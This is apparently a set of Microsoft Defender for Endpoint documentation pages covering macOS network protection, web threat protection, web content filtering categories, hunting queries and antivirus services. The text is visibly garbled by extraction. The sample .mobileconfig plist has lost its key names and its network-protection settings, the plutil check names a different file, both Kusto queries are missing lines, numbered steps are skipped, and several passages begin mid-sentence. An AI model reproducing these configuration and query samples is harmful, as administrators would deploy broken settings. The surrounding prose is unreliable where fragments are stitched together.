A successful Intune deployment requires a configuration profile to set the enforcement
level of network protection. After you create this configuration profile, assign it to the
devices where you want to enable network protection.
Configure the enforcement level using Intune
７ Note
If you've already configured Microsoft Defender for Endpoint on Mac using the
previous instructions (with an XML file), then remove the previous Custom
configuration policy and replace it with the instructions below.
1. Open Manage > Device configuration. Select Manage > Profiles > Create Profile.
2. Change Platform to macOS and Profile type to Settings catalog. Select Create.
3. Specify a name for the profile.
4. On the Configuration settings screen, select Add settings. Select Microsoft
Defender > Network protection, and tick the Enforcement level checkbox.
5. Set the enforcement level to block. Select Next
6. Open the configuration profile and upload the com.microsoft.wdav.xml file. (This
file was created in step 3.)
7. Select OK
8. Select Manage > Assignments. In the Include tab, select the devices for which you
want to enable network protection.
Mobileconfig deployment
To deploy the configuration via a .mobileconfig file, which can be used with non-
Microsoft MDM solutions or distributed to devices directly:
1. Save the following payload as com.microsoft.wdav.xml.mobileconfig
XML

<plist version="1">
<dict>
<string>Microsoft Defender ATP settings</string>
<string>Microsoft Defender ATP configuration settings</string>
<true/>
<true/>
<array>
<dict>
<string>Microsoft Defender ATP configuration
settings</string>
<string/>
<true/>
<key>networkProtection</key>
<dict>
</dict>
</dict>
</array>
</dict>
</plist>
2. Verify that the above file was copied correctly. From the Terminal, run the following
command and verify that it outputs OK:
Bash
plutil -lint com.microsoft.wdav.xml
How to explore the features

1. Learn how to Protect your organization against web threats using web threat
protection.
Web threat protection is part of web protection in Microsoft Defender for

Endpoint. It uses network protection to secure your devices against web
threats.
2. Run through the Custom Indicators of Compromise flow to get blocks on the
Custom Indicator type.
3. Explore Web content filtering.
７ Note
If you are removing a policy or changing device groups at the same time, this
might cause a delay in policy deployment. Pro tip: You can deploy a policy
without selecting any category on a device group. This action will create an
audit only policy, to help you understand user behavior before creating a
block policy.
2.
4. Integrate Microsoft Defender for Endpoint with Defender for Cloud Apps and your
network protection-enabled macOS devices have endpoint policy enforcement
capabilities.
７ Note
Discovery and other features are currently not supported on these platforms.
Scenarios
The following scenarios are supported.

Web threat protection is part of web protection in Microsoft Defender XDR for Endpoint.
It uses network protection to secure your devices against web threats. By integrating
with Microsoft Edge for macOS and popular non-Microsoft browsers, such as Chrome
and Firefox, web threat protection stops web threats without a web proxy. Web threat
protection can protect devices while they're on premises or away. Web threat protection
stops access to the following types of sites:
phishing sites
malware vectors
exploit sites
untrusted or low-reputation sites
sites that are blocked in your custom indicator list

For more information, see Protect your organization against web threat
Custom Indicators of Compromise

protection solution. This capability gives SecOps the ability to set a list of indicators for
detection and for blocking (prevention and response).
Create indicators that define the detection, prevention, and exclusion of entities. You can
define the action to be taken as well as the duration for when to apply the action and
the scope of the device group to apply it to.
Currently supported sources are the cloud detection engine of Defender for Endpoint,
the automated investigation and remediation engine, and the endpoint prevention
engine (Microsoft Defender Antivirus).
For more information, see: Create indicators for IPs and URLs/domains.

audited. Your users can access the URLs without disruption, and you gather access
statistics to help create a more custom policy decision. Your users see a block
resource.
Network Protection (Safari, Chrome, Firefox, Brave, and Opera). For more information
about browser support, see Prerequisites.
For more information about reporting, see Web content filtering.

The Microsoft Defender for Cloud Apps / Cloud App Catalog identifies apps you would
want end users to be warned upon accessing with Microsoft Defender XDR for Endpoint,
and mark them as Monitored. The domains listed under monitored apps would be later
synced to Microsoft Defender XDR for Endpoint:
Within 10-15 minutes, these domains are listed in Microsoft Defender XDR under
Indicators > URLs/Domains with Action=Warn. Within the enforcement SLA (see details
at the end of this article), end users are getting warn messages when attempting to
access these domains:
When the end user is attempting to access monitored domains, they're warned by
The user gets a plain block experience accompanied by the following toast
message, which is displayed by the operating system including the name of the
blocked application (e.g Blogger.com)
If the end user encounters a block, the user has two possible resolutions:
User bypass
For toast message experience: Press the Unblock button. By reloading the
webpage, the user is able to proceed and use the cloud app. (This action is
applicable for the next 24 hours, after which the user has to unblock once again)
User education
For toast message experience: Press the toast message itself. End user is
redirected to a custom redirect URL set globally in Microsoft Defender for Cloud
Apps (More information at the bottom of this page)
７ Note
Tracking bypasses per app** – You can track how many users have bypassed the
warning in the Application page in Microsoft Defender for Cloud Apps.
Appendix
End user education center SharePoint site template

For many organizations, it's important to take the cloud controls provided by Microsoft
Defender for Cloud Apps, and to not only set limitations on end users when needed, but
to also educate and coach them about:
the specific incident

why it has happened
what is the thinking behind this decision
how encountering block sites can be mitigated
Upon facing an unexpected behavior, users' confusion might be reduced by providing

them as much information as possible, not only to explain about what has happened
but to also educate them to be more aware the next time they choose a cloud app to
complete their job. For example, this information can include:
Organization security and compliance policies and guidelines for internet and
cloud use
Approved/recommended cloud apps for use
Restricted/blocked cloud apps for use
For this page, we recommend that your organization uses a basic SharePoint site.
Important things to know

1. It can take up to two hours (typically less) for app domains to propagate and to be
update in the endpoint devices, after it's marked as Monitored.
2. By default, action is taken for all apps and domains that were marked as Monitored
in Microsoft Defender for Cloud Apps portal for all the onboarded endpoints in the
organization.
3. Full URLs are currently not supported and won't be sent from Microsoft Defender
for Cloud Apps to Microsoft Defender XDR for Endpoint, if any full URLs are listed
under Microsoft Defender for Cloud Apps monitored apps, hence, user won't get
warned on access attempt (for example, google.com/drive isn't supported, while
drive.google.com is supported).
No End-user notification on third party browsers? Check your toast message settings.
See also
Microsoft Defender XDR for Endpoint on Mac
Microsoft Defender XDR for Endpoint integration with Microsoft Microsoft
Defender XDR for Cloud Apps
Get to know the innovative features in Microsoft Edge
Web protection
Create indicators
 Tip
Feedback

Web protection
Article • 12/16/2022
Applies to:

About web protection

Web protection in Microsoft Defender for Endpoint is a capability made up of Web
threat protection, Web content filtering, and Custom indicators. Web protection lets you
secure your devices against web threats and helps you regulate unwanted content. You
can find Web protection reports in the Microsoft Defender portal by going to Reports >
Web protection.

The cards that make up web threat protection are Web threat detections over time and
Web threat summary.
Web threat protection includes:

Comprehensive visibility into web threats affecting your organization.
Investigation capabilities over web-related threat activity through alerts and
comprehensive profiles of URLs and the devices that access these URLs.
A full set of security features that track general access trends to malicious and
unwanted websites.
７ Note
For processes other than Microsoft Edge and Internet Explorer, web protection
scenarios leverage Network Protection for inspection and enforcement:
IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS)).
Only single IP addresses are supported (no CIDR blocks or IP ranges) in
custom indicators.
Encrypted URLs (full path) can only be blocked on first party browsers
(Internet Explorer, Edge).
Encrypted URLs (FQDN only) can be blocked in third party browsers (i.e. other
than Internet Explorer, Edge).
Full URL path blocks can be applied for unencrypted URLs.
There may be up to 2 hours of latency (usually less) between the time the action is
taken, and the URL and IP being blocked.
For more information, see Web threat protection.
Custom indicators
Custom indicator detections are also summarized in your organizations web threat
reports under Web threat detections over time and Web threat summary.
Custom indicator includes:
Ability to create IP and URL-based indicators of compromise to protect your

organization against threats.
Investigation capabilities over activities related to your custom IP/URL profiles and
the devices that access these URLs.
The ability to create Allow, Block, and Warn policies for IPs and URLs.
For more information, see Create indicators for IPs and URLs/domains

Web content filtering includes Web activity by category, Web content filtering
summary, and Web activity summary.
Web content filtering includes:
Users are prevented from accessing websites in blocked categories, whether they
are browsing on-premises or away.
You can conveniently deploy varied policies to various sets of users using the
device groups defined in the Microsoft Defender for Endpoint role-based access
control settings.
７ Note
2.
You can access web reports in the same central location, with visibility over actual
blocks and web usage.
For more information, see Web content filtering.
Order of precedence
Web protection is made up of the following components, listed in order of precedence.
Each of these components is enforced by the SmartScreen client in Microsoft Edge and
by the Network Protection client in all other browsers and processes.
Custom indicators (IP/URL, Microsoft Defender for Cloud Apps policies)

Allow
Warn
Block
Web threats (malware, phish)

SmartScreen Intel, including Exchange Online Protection (EOP)
Escalations
Web Content Filtering (WCF)
７ Note
Microsoft Defender for Cloud Apps currently generates indicators only for blocked
URLs.
The order of precedence relates to the order of operations by which a URL or IP is
evaluated. For example, if you have a web content filtering policy you can create
exclusions through custom IP/URL indicators. Custom Indicators of compromise (IoC)
are higher in the order of precedence than WCF blocks.
Similarly, during a conflict between indicators, allows always take precedence over
blocks (override logic). That means that an allow indicator will win over any block
indicator that is present.
The table below summarizes some common configurations that would present conflicts
within the web protection stack. It also identifies the resulting determinations based on
the precedence listed above.
ﾉ Expand table
Custom Indicator Web threat WCF Defender for Cloud Result

policy policy policy Apps policy
Allow Block Block Block Allow (Web protection

override)
Allow Allow Block Block Allow (WCF exception)
Warn Block Block Block Warn (override)
Internal IP addresses are not supported by custom indicators. For a warn policy when
bypassed by the end user, the site will be unblocked for 24 hours for that user by
default. This time frame can be modified by the Admin and is passed down by the
SmartScreen cloud service. The ability to bypass a warning can also be disabled in
Microsoft Edge using CSP for web threat blocks (malware/phishing). For more
information, see Microsoft Edge SmartScreen Settings.
Protect browsers
In all web protection scenarios, SmartScreen and Network Protection can be used
together to ensure protection across both first and third-party browsers and processes.
SmartScreen is built directly into Microsoft Edge, while Network Protection monitors
traffic in third-party browsers and processes. The diagram below illustrates this concept.
This diagram of the two clients working together to provide multiple browser/app
coverages is accurate for all features of Web Protection (Indicators, Web Threats,
Content Filtering).

Troubleshoot endpoint blocks

Responses from the SmartScreen cloud are standardized. Tools like Fiddler can be used
to inspect the response from the cloud service, which will help determine the source of
the block.
When the SmartScreen cloud service responds with an allow, block, or warn response, a
response category and server context is relayed back to the client. In Microsoft Edge, the
response category is what is used to determine the appropriate block page to show
(malicious, phishing, organizational policy).
The table below shows the responses and their correlated features.
ﾉ Expand table
ResponseCategory Feature responsible for the block
CustomPolicy WCF
CustomBlockList Custom indicators
CasbPolicy Defender for Cloud Apps
Malicious Web threats
Phishing Web threats
Advanced hunting for web protection

Kusto queries in advanced hunting can be used to summarize web protection blocks in
your organization for up to 30 days. These queries use the information listed above to
distinguish between the various sources of blocks and summarize them in a user-
friendly manner. For example, the query below lists all WCF blocks originating from
Microsoft Edge.
Kusto
DeviceEvents
| where ActionType == "SmartScreenUrlWarning"
InitiatingProcessFileName, Experience=tostring(ParsedFields.Experience)
| where Experience == "CustomPolicy"
Similarly, you can use the query below to list all WCF blocks originating from Network
Protection (for example, a WCF block in a third-party browser). Note that the ActionType
has been updated and 'Experience' has been changed to 'ResponseCategory'.
Kusto
DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
InitiatingProcessFileName,
ResponseCategory=tostring(ParsedFields.ResponseCategory)
| where ResponseCategory == "CustomPolicy"
To list blocks that are due to other features (like Custom Indicators), refer to the table
above outlining each feature and their respective response category. These queries may
also be modified to search for telemetry related to specific machines in your
organization. Note that the ActionType shown in each query above will show only those
connections that were blocked by a Web Protection feature, and not all network traffic.
User experience
If a user visits a web page that poses a risk of malware, phishing, or other web threats,
Microsoft Edge will trigger a block page that reads 'This site has been reported as
unsafe' along with information related to the threat.

If blocked by WCF or a custom indicator, a block page shows in Microsoft Edge that tells
the user this site is blocked by their organization.

In any case, no block pages are shown in third-party browsers, and the user sees a
"Secure Connection Failed' page along with a toast notification. Depending on the
policy responsible for the block, a user will see a different message in the toast
notification. For example, web content filtering will display the message 'This content is
blocked'.
Report false positives

To report a false positive for sites that have been deemed dangerous by SmartScreen,
use the link that appears on the block page in Microsoft Edge (as shown above).
For WCF, you can dispute the category of a domain. Navigate to the Domains tab of the
WCF reports. You will see an ellipsis beside each of the domains. Hover over this ellipsis
and select Dispute Category. A flyout will open. Set the priority of the incident and
provide some additional details, such as the suggested category. For more information
on how to turn on WCF and how to dispute categories, see Web content filtering.
For more information on how to submit false positives/negatives, see Address false
positives/negatives in Microsoft Defender for Endpoint.
Related information
ﾉ Expand table
Topic Description
Web threat Stop access to phishing sites, malware vectors, exploit sites, untrusted or low-
protection reputation sites, and sites that you have blocked.
Web content Track and regulate access to websites based on their content categories.
filtering
 Tip
Feedback

Protect your organization against web
threats
Article • 02/16/2024
Applies to:

Web threat protection is part of Web protection in Defender for Endpoint. It uses
network protection to secure your devices against web threats. By integrating with
Microsoft Edge and popular third-party browsers like Chrome and Firefox, web threat
protection stops web threats without a web proxy and can protect devices while they're
away or on premises. Web threat protection stops access to phishing sites, malware
vectors, exploit sites, untrusted or low-reputation sites, and sites that you are blocked
because they're in your custom indicator list.
７ Note
It might take up to two hours for devices to receive new custom indicators.
Prerequisites
Web protection uses network protection to provide web browsing security on Microsoft
Edge and non-Microsoft web browsers.
To turn on network protection on your devices:
Edit the Defender for Endpoint security baseline under Web & Network Protection
to enable network protection before deploying or redeploying it. Learn about
reviewing and assigning the Defender for Endpoint security baseline
Turn network protection on using Intune device configuration, SCCM, Group Policy,
or your MDM solution. Read more about enabling network protection
７ Note
If you set network protection to Audit only, blocking will be unavailable. Also, you
will be able to detect and log attempts to access malicious and unwanted websites
on Microsoft Edge only.
Configure web threat protection

The following procedure describes how to configure web threat protection using the
Microsoft Intune admin center.
1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com ), and

sign in.
2. Choose Endpoint security > Attack surface reduction, and then choose + Create
policy.
3. Select a platform, such as Windows 10 and later, select the Web protection profile,
and then choose Create.
5. On the Configuration settings tab, expand Web Protection, specify your settings,
and then choose Next.
Set Enable network protection to Enabled so web protection is turned on.

Alternately, you can set network protection to Audit mode to see how it
works in your environment. In audit mode, network protection doesn't
prevent users from visiting sites or domains, but it does track detections as
events.
To protect users from potential phishing scams and malicious software, turn
Require SmartScreen for Microsoft Edge Legacy to Yes.
To prevent users from bypassing warnings about potentially malicious sites,
set Block malicious site access to Yes.
To prevent users from bypassing the warnings and downloading unverified
files, set Block unverified file download to Yes.
scope tags, and then choose Next. (If you aren't using scope tags, choose Next.)
7. On the Assignments tab, specify the users and devices to receive the web
protection policy, and then choose Next.
Related articles
Web protection overview
Monitor web security
Respond to web threats
Network protection
 Tip
Feedback

Monitor web browsing security
Article • 07/18/2023
Applies to:

Web protection lets you monitor your organization's web browsing security through
reports under Reports > Web protection in the Microsoft Defender portal. The report
contains cards that provide web threat detection statistics.
Web threat protection detections over time - this trending card displays the
number of web threats detected by type during the selected time period (Last 30
days, Last 3 months, Last 6 months)
Web threat protection summary - this card displays the total web threat
detections in the past 30 days, showing distribution across the different types of
web threats. Selecting a slice opens the list of the domains that were found with
malicious or unwanted websites.

７ Note
It can take up to 12 hours before a block is reflected in the cards or the domain list.
Types of web threats

Web protection categorizes malicious and unwanted websites as:
Phishing - websites that contain spoofed web forms and other phishing
mechanisms designed to trick users into divulging credentials and other sensitive
information
Malicious - websites that host malware and exploit code
Custom indicator - websites whose URLs or domains you've added to your custom
indicator list for blocking
View the domain list

Select a specific web threat category in the Web threat protection summary card to
open the Domains page. This page displays the list of the domains under that threat
category. The page provides the following information for each domain:
Access count - number of requests for URLs in the domain

Blocks - number of times requests were blocked
Access trend - change in number of access attempts
Threat category - type of web threat
Devices - number of devices with access attempts
Select a domain to view the list of devices that have attempted to access URLs in that
domain and the list of URLs.
Related topics
 Tip
Feedback

Article • 02/16/2024
Applies to:

Web protection in Microsoft Defender for Endpoint lets you efficiently investigate and
respond to alerts related to malicious websites and websites in your custom indicator
list.
View web threat alerts

Microsoft Defender for Endpoint generates the following alerts for malicious or
suspicious web activity:
Suspicious connection blocked by network protection: This alert is generated

when network protection (in block mode) stops an attempt to access a malicious
website or a website in your custom indicator list.
Suspicious connection detected by network protection: This alert is generated
when network protection (in audit mode) detects an attempt to access a malicious
website or a website in your custom indicator list.
Each alert provides the following information:
Device that attempted to access the blocked website

Application or program used to send the web request
Malicious URL or URL in the custom indicator list
Recommended actions for responders

７ Note
To reduce the volume of alerts, Microsoft Defender for Endpoint consolidates web
threat detections for the same domain on the same device each day to a single
alert. Only one alert is generated and counted into the web protection report.
Inspect website details

You can dive deeper by selecting the URL or domain of the website in the alert. This
opens a page about that particular URL or domain with various information, including:
Devices that attempted to access website
Incidents and alerts related to the website
How frequent the website was seen in events in your organization
For more information, see About URL or domain entity pages.

Inspect the device
You can also check the device that attempted to access a blocked URL. Selecting the
name of the device on the alert page opens a page with comprehensive information
about the device.
For more information, see About device entity pages.
Web browser and Windows notifications for

end users
With web protection in Defender for Endpoint, your end users are prevented from
visiting malicious or unwanted websites using Microsoft Edge or other browsers.
Because blocking is done by network protection and not their web browser, users see a
generic error from the web browser. They also see a notification from Windows.
Web threat blocked on Microsoft Edge


Web threat blocked on Chrome
Related articles
 Tip
Feedback

Article • 02/02/2024
Applies to:

 Tip
What is web content filtering?

audited. Your users can access the URLs without disruption, and you'll gather access
statistics to help create a more custom policy decision. Your users will see a block
resource.
７ Note
Windows Defender SmartScreen (Microsoft Edge) and network protection (Chrome,
Firefox, Brave, and Opera). For more information about browser support, see the
prerequisites section.
７ Note
Web content filtering does not apply policies to isolated browser sessions (i.e.
Microsoft Defender Application Guard). The feature is also restricted to specific
browsers via process name. This means that web content filtering doesn't work
when there is a local proxy application in place (such as Fiddler, ZScaler), due to the
process name being masked.
Benefits of web content filtering

Users are prevented from accessing websites in blocked categories, whether
they're browsing on-premises or away.
Your security team can access web reports in the same central location, with
visibility over actual blocks and web usage.
If you are using Defender for Endpoint, your security team can conveniently deploy
policies to groups of users using device groups defined in Microsoft Defender for
Endpoint role-based access control settings.
If you are using Defender for Business, you can define one web content filtering
policy that will be applied to all users.
Prerequisites
Before trying out this feature, make sure you meet the requirements described in the
following table:
ﾉ Expand table
Subscription Your subscription must include one of the following:

- Windows 10/11 Enterprise E5
- Microsoft 365 E5
- Microsoft 365 A5
- Microsoft 365 E5 Security
- Microsoft 365 E3
- Microsoft Defender for Endpoint Plan 1 or Plan 2
- Microsoft Defender for Business
- Microsoft 365 Business Premium
Portal access You must have access to the Microsoft Defender portal .
Operating Your organization's devices must be running one of the following operating
system systems with the latest antivirus/antimalware updates:
- Windows 11
- Windows 10 Anniversary Update (version 1607) or later
- For information on MacOS availability, see Network Protection for MacOS
- For information on Linux availability, see Network Protection for Linux
Browser Your organization's devices must be running one of the following browsers:
- Microsoft Edge
- Google Chrome
- Mozilla FireFox
- Brave
- Opera
- Internet Explorer
Related Windows Defender SmartScreen and network protection must be enabled on

protection your organization's devices.
Data handling
Data is stored in the region that was selected as part of your Microsoft Defender for
Endpoint data handling settings. Your data will not leave the data center in that region.
In addition, your data will not be shared with any third parties, including our data
providers.
Precedence for multiple active policies

Applying multiple different web content filtering policies to the same device will result in
the more restrictive policy applying for each category. Consider the following scenario:
Policy 1: blocks categories 1 and 2 and audits the rest

Policy 2: blocks categories 3 and 4 and audits the rest
The result is that categories 1 - 4 are all blocked. This is illustrated in the following
image.
Turn on web content filtering
1. Go to the Microsoft Defender portal and sign in.
Features.
3. Scroll down until you see Web content filtering.
4. Switch the toggle to On, and then select Save preferences.
Configure web content filtering policies

Web content filtering policies specify which site categories are blocked on which device
groups. To manage the policies, go to Settings > Endpoints > Web content filtering
(under Rules).
Policies can be deployed to block any of the following parent or child categories:
ﾉ Expand table
Parent Child categories

category
Adult content - Cults: Sites related to groups or movements whose members demonstrate
passion for a belief system that is different from those that are socially
accepted.
- Gambling: Online gambling and sites that promote gambling skills and
practice.
- Nudity: Sites that provide full-frontal and semi-nude images or videos,

typically in artistic form, and might allow the download or sale of such materials.
- Pornography / Sexually explicit: Sites containing sexually explicit content in

an image-based or textual form. Any form of sexually oriented material is also
listed here.
- Sex education: Sites that discuss sex and sexuality in an informative and non-
voyeuristic way, including sites that provide education about human
reproduction and contraception, sites that offer advice on preventing infection
from sexual diseases, and sites that offer advice on sexual health matters.
- Tasteless: Sites oriented towards content unsuitable for school children to

view or that an employer would be uncomfortable with their staff accessing, but
not necessarily violent or pornographic.
- Violence: Sites that display or promote content related to violence against

humans or animals.
High - Download sites: Sites whose primary function is to allow users to download
bandwidth media content or programs, such as computer programs.
- Image sharing: Sites that are used primarily for searching or sharing photos,
including those that have social aspects.
- Peer-to-peer: Sites that host peer-to-peer (P2P) software or facilitate the

sharing of files using P2P software.
- Streaming media & downloads: Sites whose primary function is the

distribution of streaming media, or sites that allow users to search, watch, or
listen to streaming media.
Legal liability - Child abuse images: Sites that include child abuse images or pornography.
- Criminal activity: Sites that give instruction on, advice about, or promotion of
illegal activities.
- Hacking: Sites that provide resources for illegal or questionable use of

Parent Child categories
category
computer software or hardware, including sites that distribute copyrighted

material that has been cracked.
- Hate & intolerance: Sites promoting aggressive, degrading, or abusive

opinions about any section of the population that could be identified by race,
religion, gender, age, nationality, physical disability, economic situation, sexual
preferences or any other lifestyle choice.
- Illegal drug: Sites that sell illegal/controlled substances, promote substance

abuse, or sell related paraphernalia.
- Illegal software: Sites that contain or promote the use of malware, spyware,
botnets, phishing scams, or piracy & copyright theft.
- School cheating: Sites related to plagiarism or school cheating.
- Self-harm: Sites that promote self-harm, including cyberbullying sites that

contain abusive and/or threatening messages towards users.
- Weapons: Any site that sells weapons or advocates the use of weapons,
including but not limited to guns, knives, and ammunition.
Leisure - Chat: Sites that are primarily web-based chat rooms.
- Games: Sites relating to video or computer games, including sites that

promote gaming through hosting online services or information related to
gaming.
- Instant messaging: Sites that can be used to download instant messaging

software or client based instant messaging.
- Professional network: Sites that provide professional networking services.
- Social networking: Sites that provide social networking services.
- Web-based email: Sites offering web-based mail services.
Uncategorized - Newly registered domains: Sites that have been newly registered in the past
30 days and have not yet been moved to another category.
- Parked domains: Sites that have no content or are parked for later use.
７ Note
Uncategorized contains only newly registered domains and parked domains, and
does not include all other sites outside of these categories.
Create a policy
To add a new policy, follow these steps:
1. In the Microsoft Defender portal , choose Settings > Endpoints > Web content
filtering > + Add policy.
2. Specify a name.
3. Select the categories to block. Use the expand icon to fully expand each parent
category and select specific web content categories.
4. Specify the policy scope. Select the device groups to specify where to apply the
policy. Only devices in the selected device groups will be prevented from accessing
websites in the selected categories.
） Important
If you're using either Microsoft 365 Business Premium or Defender for

Business, your web content filtering policy is applied to all users by default.
Scoping does not apply.
5. Review the summary and save the policy.
７ Note
There might be up to 2 hours of latency between the time a policy is created

and when it's enforced on the device.
You can deploy a policy without selecting any category on a device group.
This action creates an audit-only policy to help you understand user behavior
before creating a block policy.
If you are removing a policy or changing device groups at the same time,
there could be a delay in policy deployment.
Blocking the "Uncategorized" category could lead to unexpected and
undesired results.
End-user experience
The blocking experience for third-party supported browsers is provided by network
protection, which provides a system-level message notifying the user of a blocked
connection. For a more user-friendly, in-browser experience, consider using Microsoft
Edge.
Allow specific websites

It's possible to override the blocked category in web content filtering to allow a single
site by creating a custom indicator policy. The custom indicator policy will supersede the
web content filtering policy when it's applied to the device group in question.
To define a custom indicator, follow these steps:
1. In the Microsoft Defender portal , go to Settings > Endpoints > Indicators >
URL/Domain > Add Item.
2. Enter the domain of the site.
3. Set the policy action to Allow.
Dispute categories
If you encounter a domain that has been incorrectly categorized, you can dispute the
category directly from the Microsoft Defender portal.
To dispute the category of a domain, navigate to Reports > Web protection > Web
content filtering categories details > Domains. On the domains tab of the Web Content
Filtering reports, find the ellipsis beside each of the domains. Hover over the ellipsis and
then select Dispute Category.
A panel opens where you can select the priority and add more details such as the
suggested category for recategorization. Once you complete the form, select Submit.
Our team will review the request within one business day. For immediate unblocking,
create a custom allow indicator.
Web content filtering cards and details

Select Reports > Web protection to view cards with information about web content
filtering and web threat protection. The following cards provide summary information
about web content filtering.
Web activity by category
This card lists the parent web content categories with the largest increase or decrease in
the number of access attempts. Understand drastic changes in web activity patterns in
your organization from last 30 days, 3 months, or 6 months. Select a category name to
view more information.
In the first 30 days of using this feature, your organization might not have enough data
to display this information.
Web content filtering summary card

This card displays the distribution of blocked access attempts across the different parent
web content categories. Select one of the colored bars to view more information about
a specific parent web category.

Web activity summary card
This card displays the total number of requests for web content in all URLs.
View card details

You can access the Report details for each card by selecting a table row or colored bar
from the chart in the card. The report details page for each card contains extensive
statistical data about web content categories, website domains, and device groups.
Web categories: Lists the web content categories that have had access attempts in
your organization. Select a specific category to open a summary flyout.
Domains: Lists the web domains that have been accessed or blocked in your
organization. Select a specific domain to view detailed information about that
domain.
Device groups: Lists all the device groups that have generated web activity in your
organization
Use the time range filter at the top left of the page to select a time period. You can also
filter the information or customize the columns. Select a row to open a flyout pane with
even more information about the selected item.
Network protection does not currently support SSL inspection, which might result in
some sites being allowed by web content filtering that would normally be blocked. Sites
would be allowed due to a lack of visibility into encrypted traffic after the TLS handshake
has taken place and an inability to parse certain redirects. This includes redirections from
some web-based mail login pages to the mailbox page. As an accepted workaround,
you can create a custom block indicator for the login page to ensure no users are able
to access the site. Keep in mind, this might block their access to other services
associated with the same website.
If you are using Microsoft 365 Business Premium or Microsoft Defender for Business,
you can define one web content filtering policy for your environment. That policy will
apply to all users by default.
See also
Requirements for Network Protection
 Tip
Feedback

Next-generation protection overview
Article • 07/18/2023
Applies to

Platforms
Windows
Microsoft Defender for Endpoint includes next-generation protection to reinforce the

security perimeter of your network. Next-generation protection was designed to catch
all types of emerging threats. In addition to Microsoft Defender Antivirus, your next-
generation protection services include the following capabilities:
Behavior-based, heuristic, and real-time antivirus protection, which includes

always-on scanning using file and process behavior monitoring and other
heuristics (also known as real-time protection). It also includes detecting and
blocking apps that are deemed unsafe, but might not be detected as malware.
Cloud-delivered protection, which includes near-instant detection and blocking of
new and emerging threats.
Dedicated protection and product updates, which includes updates related to
keeping Microsoft Defender Antivirus up to date.
Next-generation protection is included in both Defender for Endpoint Plan 1 and Plan 2.
Next-generation protection is also included in Microsoft Defender for Business and
Microsoft 365 Business Premium.
To configure next-generation protection services, see Configure Microsoft Defender

Antivirus features.
If you're looking for antivirus-related information for other platforms, see one of the
following articles:

 Tip
Performance tip Due to a variety of factors (examples listed below) Microsoft

Defender Antivirus, like other antivirus software, can cause performance issues on
endpoint devices. In some cases, you might need to tune the performance of
Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's
Performance analyzer is a PowerShell command-line tool that helps determine
which files, file paths, processes, and file extensions might be causing performance
issues; some examples are:
Top paths that impact scan time

Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations – for example:
top files per extension
top paths per extension
top processes per path
top scans per file
top scans per file per process
You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See Performance analyzer for
 Tip
Feedback
Microsoft Defender Antivirus in
Windows
Article • 01/16/2024
Applies to:
Microsoft Defender for Endpoint Plans 1 and 2

Platforms
Windows
Microsoft Defender Antivirus is available in Windows 10 and Windows 11, and in

versions of Windows Server.
Microsoft Defender Antivirus is a major component of your next-generation protection

in Microsoft Defender for Endpoint. This protection brings together machine learning,
big-data analysis, in-depth threat resistance research, and the Microsoft cloud
infrastructure to protect devices (or endpoints) in your organization. Microsoft Defender
Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to
provide protection on your device and in the cloud.
Compatibility with other antivirus products

If you're using a non-Microsoft antivirus/antimalware product on your device, you might
be able to run Microsoft Defender Antivirus in passive mode alongside the non-
Microsoft antivirus solution. It depends on the operating system used and whether your
device is onboarded to Defender for Endpoint. To learn more, see Microsoft Defender
Antivirus compatibility.
Microsoft Defender Antivirus processes and

services
The following table summarizes Microsoft Defender Antivirus processes and services.
You can view them in Task Manager in Windows.
ﾉ Expand table
Process or service Where to view its status
Microsoft Defender Antivirus Core service - Processes tab: Antimalware Core Service
( MdCoreSvc ) - Details tab: MpDefenderCoreService.exe
- Services tab: Microsoft Defender Core Service
Microsoft Defender Antivirus service - Processes tab: Antimalware Service Executable

( WinDefend ) - Details tab: MsMpEng.exe
- Services tab: Microsoft Defender Antivirus
Microsoft Defender Antivirus Network - Processes tab: Microsoft Network Realtime

Realtime Inspection service Inspection Service
( WdNisSvc ) - Details tab: NisSrv.exe
- Services tab: Microsoft Defender Antivirus
Network Inspection Service
Microsoft Defender Antivirus command- - Processes tab: N/A

line utility - Details tab: MpCmdRun.exe
- Services tab: N/A
Microsoft Security Client Policy - Processes tab: N/A

Configuration Tool - Details tab: ConfigSecurityPolicy.exe
- Services tab: N/A
For Microsoft Endpoint Data Loss Prevention (Endpoint DLP), the following table
summarizes processes and services. You can view them in Task Manager in Windows.
ﾉ Expand table
Process or service Where to view its status
Microsoft Endpoint DLP service - Processes tab: MpDlpService.exe

( MDDlpSvc ) - Details tab: MpDlpService.exe
- Services tab: Microsoft Data Loss Prevention
Service
Microsoft Endpoint DLP command-line - Processes tab: N/A

utility - Details tab: MpDlpCmd.exe
- Services tab: N/A
Microsoft Defender Core service

To enhance your endpoint security experience, Microsoft is releasing the Microsoft
Defender Core service to help with the stability and performance of Microsoft Defender
Antivirus. For customers who are using Microsoft Endpoint Data Loss Prevention in the
small, medium, and enterprise business sectors, Microsoft is splitting the codebase to its
own service.
The Microsoft Defender Core service is releasing with Microsoft Defender Antivirus
platform version 4.18.23110.2009.
Rollout begins in November 2023 to prerelease customers, with plans to release to

all enterprise customers in the coming months.
Enterprise customers should allow the following URLs:

*.events.data.microsoft.com
*.endpoint.security.microsoft.com
*.ecs.office.com
Enterprise U.S. Government customers should allow the following URLs:

*.events.data.microsoft.com
*.endpoint.security.microsoft.us (GCC-H & DoD)

*.gccmod.ecs.office.com (GCC-M)
*.config.ecs.gov.teams.microsoft.us (GCC-H)
*.config.ecs.dod.teams.microsoft.us (DoD)
If you're using Application Control for Windows, or you're running non-Microsoft

antivirus or endpoint detection and response software, make sure to add the
processes mentioned earlier to your allow list.
Consumers need not take any actions to prepare.
Comparing active mode, passive mode, and

disabled mode
The following table describes what to expect when Microsoft Defender Antivirus is in
active mode, passive mode, or disabled.
ﾉ Expand table
Mode What happens
Active mode In active mode, Microsoft Defender Antivirus is used as the primary antivirus app
on the device. Files are scanned, threats are remediated, and detected threats are
listed in your organization's security reports and in your Windows Security app.
Passive mode In passive mode, Microsoft Defender Antivirus is not used as the primary
antivirus app on the device. Files are scanned, and detected threats are reported,
Mode What happens
but threats are not remediated by Microsoft Defender Antivirus.
IMPORTANT: Microsoft Defender Antivirus can run in passive mode only on

endpoints that are onboarded to Microsoft Defender for Endpoint. See
Requirements for Microsoft Defender Antivirus to run in passive mode.
